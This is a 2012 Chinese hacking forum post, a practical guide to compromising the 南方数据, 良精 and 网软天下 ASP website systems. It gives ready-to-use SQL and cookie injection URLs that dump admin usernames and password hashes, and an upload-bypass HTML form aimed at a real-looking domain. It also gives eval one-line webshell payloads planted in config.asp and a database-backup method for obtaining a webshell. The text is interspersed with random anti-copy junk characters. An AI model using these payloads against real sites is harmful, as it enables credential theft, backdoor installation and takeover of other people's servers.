找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2461|回复: 0
打印 上一主题 下一主题

南方数据网站管理系统注入漏洞&后台拿WebShell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-4 11:06:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  /Databases/0791idc.mdb( q/ H) H+ |- R! Y
1.注入点:news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7
4 ^/ _) T  d& p7 q也可能是(另外一个版本)news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9,10 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7
9 e) G- C. H) k: E直接暴管理员帐号密码(md5)' B8 ~/ }) H) L) m  p8 N
2.登陆后台
  X. H, s- t( f: c4 S! ^9 B/ J3.利用编辑器上传:. h# a5 V6 c. l; a1 H
访问admin/southidceditor/admin_style.asp
* H3 }7 N) A* O修改编辑器样式,增加asa(不要asp).然后直接后台编辑新闻上传.
3 |6 l) z. L9 |: [% [# p
* f" o: E* C& T! s* U3 d1 k========================================
% \8 |6 N7 E3 @2 Z
/ A1 Y/ ?: @3 o; D2 Z+ ^参考资料整理:
% v2 _8 U9 @) w南方数据、良精系统、网软天下漏洞利用
7 S5 n: a' s- R; R% p5 g2 t
* u1 x6 S; L9 c. k* I1、通过upfile_other.asp漏洞文件直接取SHELL) S: O, M- Q4 b* y5 V* r
直接打开userreg.asp进行注册会员,进行登录,(在未退出登录的状态下)使用本地上传文件进行上传代码如下:$ W& O2 V3 e, @6 Z$ ]7 ^
<HTML><HEAD> ' a0 B- Y$ m& D+ l8 p  Q
<META http-equiv=Content-Type content="text/html; charset=gb2312"> ( _+ F! X9 T4 O1 h1 }
<STYLE type=text/css>BODY { 9 g5 o7 ^2 \+ w6 D4 `/ |6 j( K' I
FONT-SIZE: 9pt; BACKGROUND-COLOR: #e1f4ee
0 C7 Z, v8 n8 @, l3 P; l} / D& a4 k8 T3 |' t9 H6 V
.tx1 { ) ^- K; |5 F6 {# `' B( z' R
BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; FONT-SIZE: 9pt; BORDER-LEFT: #000000 1px solid; COLOR: #0000ff; BORDER-BOTTOM: #000000 1px solid; HEIGHT: 20px
/ `' q, |1 ?$ x* b) n}
/ [) Z  C9 o$ d) A* O9 q8 d( I</STYLE>3 H/ ~4 E3 m( H* e% y* X2 G
<META content="MSHTML 6.00.2800.1400" name=GENERATOR></HEAD>   w) X+ G" }+ c
<BODY leftMargin=0 topMargin=0>
4 D& r( m# T% K& `/ g" l+ U<FORM name=form1 action="http://www.huobaodidai.cn/upfile_Other.asp"; method=post
; n: ^( I5 X. X. W" I, z; AencType=multipart/form-data><INPUT class=tx1 type=file size=30 name=FileName> <INPUT class=tx1 type=file size=30 name=FileName1> <INPUT xxxxx="BORDER-RIGHT: rgb(88,88,88) 1px double; BORDER-TOP: rgb(88,88,88) 1px double; FONT-WEIGHT: normal; FONT-SIZE: 9pt; BORDER-LEFT: rgb(88,88,88) 1px double; LINE-HEIGHT: normal; BORDER-BOTTOM: rgb(88,88,88) 1px double; FONT-STYLE: normal; FONT-VARIANT: normal" type=submit value=上传 name=Submit> 0 D* s4 y3 D+ Y% G0 I
<INPUT id=PhotoUrlID type=hidden value=0 name=PhotoUrlID> </FORM></BODY></HTML>) _: t( e3 \. \) a7 e. |9 P
3 n* n+ d) ?% w0 I  g
将以上代码保存为html格式,替换代码中的网址,第一个框里选择图片文件,第二个框选择.cer、.asa或asp文件上传(后面需要加一个空格,貌似在IE8中进行使用不能后面加空格,加空格时就弹出选择文件对话框,我是找不到解决办法)。
7 g! J0 i% h* R5 \. V" `4 I2 i7 @6 R注:此方法通杀南方数据、良精系统、网软天下等2 e! E/ q! h, ~0 u& y

* M: s! l1 k) @8 m4 K4 A2、通过注入秒杀管理员帐号密码,使用如下:8 P. I: E) N% z& ]) \
http://www.huobaodidai.cn/NewsType.asp?SmallClass=’%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%20and%20’’=’
4 B) m9 F8 u  T1 w/ Y以上代码直接暴管理员帐号和密码,取SHELL方法如下:; c& s. o+ Z0 `- L: F- ^
在网站配置[http://www.target.com/admin/SiteConfig.asp]的版权信息里写入 "%><%eval(request(chr(35)))%><%’; k( Z" x5 K- `- `" c
成功把shell写入http://www.target.com/inc/config.asp
* y1 Z6 Z8 M+ A: X6 Q这里一句话chr(32)密码是“#”/ H9 K" L$ a% G! ~( W9 `7 v
3、cookie注入/ b" |& n7 Z( x& Y. h8 @
清空地址栏,利用union语句来注入,提交:" `; o2 O( g* n9 U
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from Admin"))
  h& I5 g4 N6 {" X$ q. }) }4 f如果你牛你就手工,反正我是不会,用刺猬大哥的“cookie注入转换工具”方便又迅速何乐而不为?. J6 ?4 G" S9 l3 g9 e( a9 f+ Z
注:貌似南方数据、良精系统、网软天下等系统也都存在COOKIE注入。/ r4 Z/ D* a/ E  u. v7 o' g+ ]# f
(当然南方不只有上面三个漏洞,还有几个漏洞貌似不常用,反正我给我常用的总结出来希望对大家有帮助)
0 w1 Z. H: m( G2 i6 V0 G0 C: b7 }: m+ r; Z; f
三、后台取SHELL方法总结2 l: l! n9 ]8 V) `$ ?( n/ k
(1)在系统管理中的网站配置中插入一句话马:进入后台后,点左边的”系统管理”再点击”网站配置”在右边的”网站名称”(也可以在其它处)后加入"%><%Eval(Request(chr(112)))%><%’,再点保存配置,如图:
5 i0 `* r0 O; [9 f* N然后我们打开inc/config.asp文件,看到一句话马已写入到配置文件中了,
) R2 Q. j1 m5 E这时再打开一句话马的客户端,提交同样得到一个小马4 S. \6 w4 _, ?% y  b
(注:以下均在其它网站上测试所截的图,为防止信息泄漏,未截留网站连接,请谅解!)! {# N! X9 n+ Q4 }  w; O% c  e7 c
(2)后台上传漏洞,在Upfile_Photo.asp文件中部分代码片段如下:0 J9 t: Y) ~" R
if fileEXT="asp" or fileEXT="asa" or fileEXT="aspx" then+ k0 @. }! S' b7 d; z9 f2 g0 J
EnableUpload=false
2 z6 f/ |0 H- `% ]2 K3 {# r3 \% L3 c" T* g9 B+ i2 x
end if - l$ \% T; G+ @0 a
if EnableUpload=false then+ A) D# b# h- Q
msg="这种文件类型不允许上传!nn只允许上传这几种文件类型:" & UpFileType
- `. e* {$ W5 ]* l$ x) P6 e; RFoundErr=true$ e+ j; [4 `. y& l* {! z5 N6 D: Y
end if/ b' p3 W& J+ j: V+ E) _: n
大家可以看到程序只限制了对"asp","asa","aspx"类的文件上传,我们只要在”网站配置”的允许的上传文件类型处增加上传“cer“等被服务器可解析的文件类型就可,如图:
( x; Z! y0 w# V( X( J* B- W提交时却显示下载页面 ,上传其它如”htr,cdx”等后缀文件时,提交时服务器却不请求(只能说运气不好吧)
" i: X5 @( {0 O* g) P(3)后台备份,直接在”产品管理”下的添加产品中上传jpg后缀的asp马,再到”系统管理”下的数据库备份,在”当前数据库路径”栏填入上传的路径,在” 备份数据库名称”填入你要备份马的名称,不过系统会在名称后自动添加上.asa的# ~8 C  T, ]$ ]* y9 W

6 b$ g9 w/ c8 k, V0 A点”确定”后提示”备份数据库成功….”不过实际文件是没有.asa的& Q, F) m% s5 J3 L- g
直接访问备份后的地址,就得到一个webshell' N3 S9 z) \4 `2 d
(以上虽用网软做的后台演示,但南方和良精后台取shell都是大同小异的)​
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表